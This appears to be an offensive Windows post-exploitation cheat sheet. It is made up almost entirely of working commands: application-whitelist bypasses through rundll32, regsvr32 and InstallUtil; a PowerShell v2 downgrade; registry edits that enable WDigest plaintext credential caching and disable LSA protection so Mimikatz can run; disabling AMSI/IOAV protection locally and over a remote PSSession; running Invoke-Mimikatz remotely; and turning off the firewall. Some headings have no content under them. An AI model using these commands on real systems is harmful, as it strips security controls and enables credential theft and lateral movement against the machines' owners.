This app has been blocked by your system administrator !!!
CHECK WHERE YOU CAN DROP YOUR BINARY
CHECK POWERSHELL LANGUAGE MODE
POWERSHELL VERSION DOWNGRADE
# CHECK IF OLD VERSION STILL ACTIVATED
Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2
# ABUSE
powershell.exe -version 2.0
- Can not run ps1 ?
- Include you function inside the ps1 and exec .\script.ps1
- rundll32.exe .\your.dll,Void
- REGSVR32 "C:PATH\your.dll"
- .NET
C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U C:\PATH\Bypass.exe
CHANGE LANGUAGE MODE
-
POWERSHELL COMMAND
-
REGISTRY PATH
- KEY
- POSSIBLE VALUES
- SYSTEM ENVIRONNEMENT VARIABLE
- Group Policies
MIMIKATZ ERROR kuhl_m_privilege_simple
# NEED SeDebugPrivilege
# Group Policy Management Editor -> Windows Settings -> Security Settings -> Local Policies -> User Rights Assignment -> Debug programs -> Define these policy settings
MIMIKATZ ERROR kuhl_m_sekurlsa_acquireLSA
# ENEABLE WDigest
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
MIMIKATZ ERROR kuhl_m_sekurlsa_acquireLSA
# DISABLE LSA Protection
reg add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0
MIMIKATZ ERROR kuhl_m_lsadump_secretsOrCache
# Computer Configuration -> Windows Settings -> Local Policy -> Security Options -> Interactive Logon: Number of previous logons to cache -> 10
Disable AMSI
# LOCAL
Set-MpPreference -DisableIOAVProtection $true
# Remote
$sess = New-PSSession -ComputerName websrv.domain.local
Invoke-command -ScriptBlock {Set-MpPreference -DisableIOAVProtection $true} -Session $sess
# REMOTE MIMIKATZ
Invoke-command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess
DISABLE WINDOWS DEFENDER
REMOVE WINDOWS DEFENDER
DISABLE FIREWALL
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
Set-NetFirewallProfile -Profile * -Enabled True